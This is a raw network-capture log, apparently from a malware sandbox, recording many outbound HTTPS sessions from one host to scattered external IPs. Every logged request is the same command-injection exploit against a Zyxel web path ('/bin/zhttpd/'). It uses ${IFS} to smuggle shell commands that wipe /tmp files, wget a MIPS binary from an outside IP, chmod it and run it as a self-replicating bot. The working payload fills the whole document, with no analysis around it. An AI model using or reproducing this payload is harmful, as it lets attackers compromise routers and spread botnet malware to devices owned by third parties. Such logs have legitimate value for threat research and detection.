                                                      Feb 2, 2024 06:35:55.678677082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4965192.168.2.143601269.217.197.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678733110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4966192.168.2.1441024117.181.31.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678764105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4967192.168.2.1447834218.3.151.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678805113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4968192.168.2.1456566152.212.238.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678857088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4969192.168.2.1456086163.78.237.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678894043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4970192.168.2.1446574192.248.209.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678921938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4971192.168.2.1449984117.156.201.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.678975105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4972192.168.2.1450504147.93.113.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679018021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4973192.168.2.143286077.162.234.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679049969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4974192.168.2.144107020.241.1.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679105043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4975192.168.2.143547852.152.130.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679142952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4976192.168.2.145899419.91.107.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679181099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4977192.168.2.145630296.179.47.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679210901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4978192.168.2.1440638112.223.79.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679263115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4979192.168.2.1445226106.47.195.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679311991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4980192.168.2.1437520159.148.56.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679342985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4981192.168.2.1436542181.228.5.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679399967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4982192.168.2.144198282.176.120.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679444075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4983192.168.2.143749824.197.107.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679477930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4984192.168.2.1451240189.192.203.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679534912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4985192.168.2.1458352153.58.210.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679574966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4986192.168.2.1459602117.56.76.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679608107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4987192.168.2.1455026156.119.154.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679660082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4988192.168.2.1452066103.83.159.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679709911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4989192.168.2.1452474177.23.254.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679743052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4990192.168.2.1452604124.186.177.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679790020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4991192.168.2.1456136110.35.154.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679817915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4992192.168.2.144060658.119.148.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679872036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4993192.168.2.1456568178.50.69.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679889917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4994192.168.2.1450208126.83.229.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679893970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4995192.168.2.1435772208.19.13.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679963112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4996192.168.2.1441272167.142.76.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.679999113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4997192.168.2.145118058.66.47.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680048943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4998192.168.2.14566281.213.106.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680079937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4999192.168.2.1443120126.206.50.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680118084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5000192.168.2.1447764122.220.2.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680151939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5001192.168.2.1434616138.4.238.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680174112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5002192.168.2.1455570118.7.177.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680217028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5003192.168.2.143685663.61.45.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680265903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5004192.168.2.1458358180.201.199.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680284023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5005192.168.2.146020681.31.169.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680337906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5006192.168.2.1439338159.59.78.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680366993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5007192.168.2.143882882.172.47.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680413008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5008192.168.2.144938250.226.255.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680464029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5009192.168.2.1452172193.136.36.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680494070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5010192.168.2.1442912221.8.36.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680537939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5011192.168.2.1445986200.191.64.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680574894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5012192.168.2.144297034.207.190.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680615902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5013192.168.2.145744281.40.162.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680660963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5014192.168.2.1435548108.10.225.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680706978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5015192.168.2.1444018112.61.104.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680757999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5016192.168.2.1442844169.28.23.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680793047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5017192.168.2.1449368109.61.201.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680843115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5018192.168.2.144218637.35.173.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680890083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5019192.168.2.1458984174.97.135.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680932999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5020192.168.2.1445028195.165.37.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.680974960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5021192.168.2.1457102108.53.171.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681022882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5022192.168.2.143664068.78.55.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681061983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5023192.168.2.146032258.73.120.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681096077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5024192.168.2.145832046.23.212.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681128025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5025192.168.2.1441504137.72.9.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681180000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5026192.168.2.145884461.168.76.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.681207895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5027192.168.2.1442732193.128.89.42443
                                                      TimestampBytes transferredDirectionData
